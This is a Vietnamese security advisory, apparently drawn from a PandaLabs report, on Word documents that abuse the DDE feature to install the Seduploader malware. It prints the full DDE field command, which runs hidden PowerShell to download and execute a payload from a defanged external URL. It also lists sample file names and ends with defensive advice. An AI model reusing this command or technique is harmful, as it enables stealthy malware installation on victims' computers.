Phát hiện cách cài mã độc thông qua file Microsoft Word mà các chương trình Antivirus không thể phát hiện ra.

Đó là kỹ thuật khai thác một tính năng có tên gọi Dynamic Data Exchange (DDE). DDE cho phép một file được thực thi đoạn mã lưu trữ trong một file khác và cho phép các ứng dụng có thể gửi bản cập nhật dữ liệu mới. Tính năng DDE có khả năng bị lạm dụng để cài đặt mã độc bằng cách sử dụng các file Word, mà các chương trình chống virus không phát hiện ra. Khi người nhận mở file văn bản đã bị nhiễm mã độc, tập tin sẽ kết nối với một máy chủ điều khiển để tải xuống phần đầu của malware có tên Seduploader và cài đặt nó vào máy tính nạn nhân.

HÀNH VI

Khi file văn bản bị nhiễm mã độc được mở lên, người dùng sẽ thấy một hộp thoại như sau:

Nếu nạn nhân click vào Yes, họ sẽ thấy một lời nhắc nhở như sau:

Phần mềm chứa mã độc sẽ chỉ thực thi sau khi người dùng click Yes trên cả 2 cảnh báo. Tiếp theo, một hộp thoại sau sẽ hiện ra:

File văn bản nhiễm mã độc bao gồm 2 trang. Trang đầu tiên trống, trang tiếp theo có chứa một dòng chữ bằng tiếng Nga được dịch sang tiếng Anh là :”Error! Section unspecified”

Nếu nạn nhân click chuột phải vào dòng chữ chọn “Edit field”, một tab Field sẽ hiện ra cho chúng ta thấy mã lệnh được sử dụng để khai thác lỗ hổng và cho nó được thực thi.

Cụ thể mã lệnh như sau:

DDE C:\\Windows\\System32\\cmd.exe “/k powershell -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString(‘hxxp://arkberg-design.fi/KJHDhbje71’);powershell -e $e “

Khi mở Process Tree lên, ta có thể thấy được diễn biến của việc thực thi mã độc:

Một số file văn bản bị nhiễm mã độc được tin tặc sử dụng để tấn công:

  • I_215854.doc
  • I_563435.doc
  • I_847923.doc
  • I_949842.doc
  • I_516947.doc
  • I_505075.doc
  • I_875517.doc
  • DC0005845.doc
  • DC000034.doc
  • DC000873.doc
  • I_958223.doc
  • I_224600.doc
  • I_510287.doc
  • I_959819.doc
  • I_615989.doc
  • I_839063.doc
  • I_141519.doc

 

KHUYẾN CÁO

  • Không tải và mở những file văn bản lạ, từ những nguồn không đáng tin cậy.
  • Cách ly và theo dõi đối với những máy tính bị lây nhiễm
  • Microsoft đã có hướng dẫn cho người dùng để họ có thể tự thay đổi phần thiết lập trong registry nhằm vô hiệu hóa chức năng DDE;

 

  • Bài viết được tổng hợp từ nguồn: https://www.pandasecurity.com/mediacenter/pandalabs/word-exploit/

Add Comment